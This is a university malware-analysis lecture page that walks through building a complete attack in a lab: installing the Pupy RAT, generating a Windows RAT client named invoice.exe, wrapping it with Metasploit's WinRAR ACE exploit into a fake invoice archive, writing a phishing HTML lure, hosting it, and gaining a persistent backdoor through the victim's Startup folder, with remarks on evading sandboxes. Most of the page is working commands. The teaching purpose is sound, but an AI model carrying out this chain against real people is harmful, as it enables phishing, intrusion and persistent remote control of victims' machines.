CS6038/CS5138 Malware Analysis, UC

Course content for UC Malware Analysis

View on GitHub
21 January 2020

Building Malware - Metasploit & Pupy RAT

by Coleman Kane

This lecture covered using Pupy RAT, Metasploit, and Kali to build malware for an attack.

Setting up Kali for Pupy RAT

The Pupy RAT tool is an open source Remote Access Tool that was reportedly used in an attack targeting Saudi Arabian Targets in 2017. The tool has extensive capabilities, as well as integrated Python capability to make it a lot easier to extend and script by the adversary.

You can visit the following GitHub page to learn more:

To replay the steps I used in the lecture, you can open up Kali, then bring up a terminal, and run the following commands which are documented in Pupy RAT’s install instructions.

apt-get install git libssl1.0-dev libffi-dev python-dev \
	python-pip build-essential swig tcpdump python-virtualenv
mkdir -p ~/tools/
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw
..... wait for some time ...

Once complete, you can run the following command, from inside of ~/tools/pupy/pupyw, to start the Pupy RAT shell:


Staging Additional Components for the Attack

Additionally, I want to pull down a copy of the WinRAR 5.61 installer, because we want to pretend to trick a user into installing this version onto the Win 7 VM.

wget -o ~/tools/pupy/pupyw/wrar561.exe https://www.rarlab.com/rar/wrar561.exe

Finally, I demonstrated an example HTML file intended to look like a message telling the target to install this package in order to view an invoice. The content of that HTML file is below, and following the commands below you can write it into ~/tools/pupy/pupyw/index.html.

cat > ~/tools/pupy/pupyw/index.html << END
<p>Below is the invoice you've requested</p>
<p>Please use <a href=wrar561.exe>this tool</a> to view it, and get back to us.</p>
<p><a href=invoice.pdf.ace>invoice.pdf</a></p>

Generate the Pupy RAT Backdoor

Once I have done all of the above, I switch the network from NAT over to the Host-only networking mode. Once complete, I loaded up Pupy RAT using the pupysh command described above. To generate the malware EXE, I run the following command from within the shell, which will create the new file invoice.exe in the ~/tools/pupy/pupyw directory.

gen -A x86 -O windows -f client -o invoice.exe -D .

Build the Exploit With Metasploit

Leave pupysh running and open a new terminal for Metasploit. Run the following commands in metasploit (after waiting for it to start up), in order to package this up into an ACE archive exploit:

use exploit/windows/fileformat/winrar_ace
set CUSTFILE invoice.exe
set FILENAME invoice.pdf.ace
set payload generic/custom

Once you run the exploit command, a new ACE archive will get installed into ~/.msf4/local/invoice.pdf.ace. You will want to use another shell to copy this into the pupyw staging directory:

cp ~/.msf4/local/invoice.pdf.ace ~/tools/pupy/pupyw

Hosting the Attack for Delivery

Finally we used SimpleHTTPServer to host all of this on a webserver to direct the victim VM to, listening on port 80:

python -m SimpleHTTPServer 80

Exploiting the Victim

Next we configure the Windows VM with Host-only Networking using the same virtual interface as we have configured for the Kali VM. We have Internet Explorer visit the page and follow the directions and hyperlinks. Install WinRAR and then save and extract the ACE archive. The malware gets installed by WinRAR into the user’s Startup folder, making it something that will start the next time the user reboots the system. This has the added benefit of minimizing the behavior that will automatically run inside of an automated sandbox, while still being relatively reliable: the user is likely to either log out or reboot their terminal sometime within the next week.

Once the user is logged back in after a reboot or sign-out, the malware will connect to the Pupy RAT shell, and we can use all of the commands and modules therein to explore the victim VM. Note that this attack would likely work on a Windows 10 system as well, though some behaviors might be identified as suspicious if Windows Defender is enabled.


tags: malware - lecture